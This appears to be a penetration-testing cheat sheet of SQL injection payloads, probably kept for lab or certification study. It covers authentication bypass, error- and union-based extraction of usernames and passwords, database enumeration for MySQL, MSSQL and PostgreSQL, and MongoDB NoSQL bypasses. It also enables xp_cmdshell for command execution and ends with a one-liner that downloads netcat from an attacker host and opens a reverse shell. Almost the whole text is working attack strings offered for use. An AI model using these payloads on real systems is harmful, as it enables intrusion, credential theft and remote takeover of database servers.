
SQLi


Last updated 20 days ago

SQLi Authentication Bypass

<Username>' OR 1=1-- //
'OR '' = '
<Username>'-- //
' union select 1, '<Username Field>', '<Pass Field>' 1-- //
'OR 1=1-- //
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); -- //
1 or 1=1
1' or '1'='1

MySQL

-- Info
SELECT version();
SELECT system_user();

-- DB Enumeration
SHOW DATABASES;
USE <db_name>;
SHOW TABLES;
DESCRIBE users;
SELECT * FROM test.users;

-- Credential Extraction
SELECT user, authentication_string FROM mysql.user WHERE user = 'test';

MSSQL

-- Info
SELECT @@version;
SELECT name FROM sys.databases;
SELECT * FROM offsec.information_schema.tables;
SELECT * FROM testuser.dbo.users;

-- Example users
admin : lab
guest : guest

PostgreSQL

SELECT version();
SELECT current_user;
SELECT current_database();
SELECT datname FROM pg_database;
SELECT tablename FROM pg_tables WHERE schemaname='public';
SELECT column_name FROM information_schema.columns WHERE table_name='users';

MongoDB (NoSQL Injection)

-- REST param bypass
username=admin'&password[$ne]=1

-- JSON-style
{ "username": {"$ne": null}, "password": {"$ne": null} }
{ "$where": "this.password.length < 100" }

Error-Based SQLi

tom' OR 1=1 -- //
' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

Union-Based SQLi

-- 1) Find number of columns
' ORDER BY 1-- //

-- 2) Basic Union Extraction
%' UNION SELECT database(), user(), @@version, null, null -- //
' UNION SELECT null, null, database(), user(), @@version  -- //

-- 3) Enumerate DB objects
' UNION SELECT null, table_name, column_name, table_schema, null FROM information_schema.columns WHERE table_schema=database() -- //

-- 4) Dump User Info
' UNION SELECT null, username, password, description, null FROM users -- //

Manual Code Execution in MSSQL

-- Enable xp_cmdshell (disabled by default; sp_configure needs the ALTER SETTINGS permission, i.e. sysadmin or serveradmin)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Run Command
EXEC xp_cmdshell '<command>';

-- Examples
'; EXEC xp_cmdshell 'whoami'; -- //
'; EXEC xp_cmdshell 'dir C:\Users'; -- //
'; EXEC xp_cmdshell 'ping 192.168.45.165'; -- //

Encoded Examples

%27%3B%20EXEC%20sp_configure%20%22show%20advanced%20options%22%2C%201%3B%20--%20%2F%2F
%27%3B%20EXEC%20xp_cmdshell%20%22whoami%22%3B%20--%20%2F%2F

One-Liner Reverse Shell (MSSQL)

'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "curl http://<Kali IP Address>/nc64.exe -o C:\\Users\\Public\\nc64.exe"; EXEC xp_cmdshell "C:\\Users\\Public\\nc64.exe <Kali IP Address> <Kali Port> -e cmd.exe"; -- //
